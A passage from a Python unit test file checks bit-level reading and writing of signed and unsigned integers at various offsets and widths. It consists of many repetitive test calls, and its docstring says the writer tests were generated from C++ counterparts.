_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 63, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 62, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 61, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 60, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 59, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 58, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 57, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 56, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 55, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 54, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 53, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 52, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 51, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 50, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 49, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 48, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 47, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 46, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 45, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 44, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 43, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 42, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 41, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 40, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 39, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 38, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 37, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 36, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 35, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 34, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 33, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 32, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 31, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 30, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 29, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 28, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 27, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 26, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 25, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 24, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 23, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 22, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 21, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 20, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 19, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 18, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 17, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 16, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 15, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 14, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 13, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 12, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 11, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 10, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 9, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 8, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 7, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 6, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 5, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 4, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 3, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 2, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 1, False, 1)
_test_reader(b"\xf8\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -1)
_test_reader(b"\xf0\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -2)
_test_reader(b"\xe0\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -4)
_test_reader(b"\xc0\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -8)
_test_reader(b"\x80\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -16)
_test_reader(b"\x00\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -32)
_test_reader(b"\x00\xfe\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -64)
_test_reader(b"\x00\xfc\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -128)
_test_reader(b"\x00\xf8\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -256)
_test_reader(b"\x00\xf0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -512)
_test_reader(b"\x00\xe0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -1024)
_test_reader(b"\x00\xc0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -2048)
_test_reader(b"\x00\x80\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -4096)
_test_reader(b"\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -8192)
_test_reader(b"\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -16384)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 2)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 4)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 8)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 16)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 32)
_test_reader(b"\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 64)
_test_reader(b"\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 128)
_test_reader(b"\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 256)
_test_reader(b"\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 512)
_test_reader(b"\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 1024)
_test_reader(b"\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 2048)
_test_reader(b"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 4096)
_test_reader(b"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 8192)
_test_reader(b"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 16384)
_test_reader(b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, True, 0)
def test_writer():
"""
Following tests were generated from C++ counterparts. Reasoning: python implementation lacks
writers at the moment, and adding them needs insurance that they will not diverge from their
C++ originals.
"""
def _test_writer(buffer, offset, num_bits, is_signed, expected):
bout = bytearray(len(buffer))
write_value(bout, offset, num_bits, is_signed, expected)
assert_equal(bout, buffer)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 8, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 7, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 6, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 5, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 4, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 3, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 2, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 1, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 8, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 7, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 6, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 5, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 4, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 3, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 2, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 1, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 8, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 7, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 6, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 5, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 4, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 3, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 2, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 1, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 8, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 7, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 6, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 5, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 4, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 3, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 2, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 1, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 8, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 7, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 6, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 5, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 4, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 3, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 2, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 1, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 8, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 7, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 6, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 5, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 4, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 3, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 1, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 8, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 7, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 6, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 5, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 4, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 3, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 2, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 1, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 8, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 7, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 6, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 5, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 4, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 3, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 2, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 1, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 8, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 7, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 6, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 5, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 4, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 3, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 2, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 1, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 16, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 15, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 14, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 13, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 12, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 11, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 10, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 9, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 8, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 7, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 6, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 5, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 4, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 3, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 2, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 1, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 16, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 15, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 14, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 13, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 12, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 11, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 10, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 9, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 8, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 7, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 6, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 5, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 4, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 3, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 2, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 1, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 16, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 15, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 14, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 13, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 12, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 11, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 10, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 9, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 8, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 7, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 6, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 5, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 4, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 3, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 2, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 1, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 16, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 15, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 14, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 13, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 12, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 11, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 10, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 9, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 8, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 7, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 6, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 5, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 4, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 3, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 2, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 1, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 16, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 15, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 14, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 13, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 12, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 11, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 10, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 9, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 8, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 7, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 6, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 5, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 4, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 3, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 2, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 1, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 15, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 14, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 13, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 12, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 11, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 10, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 9, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 8, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 7, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 6, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 5, False, 1)
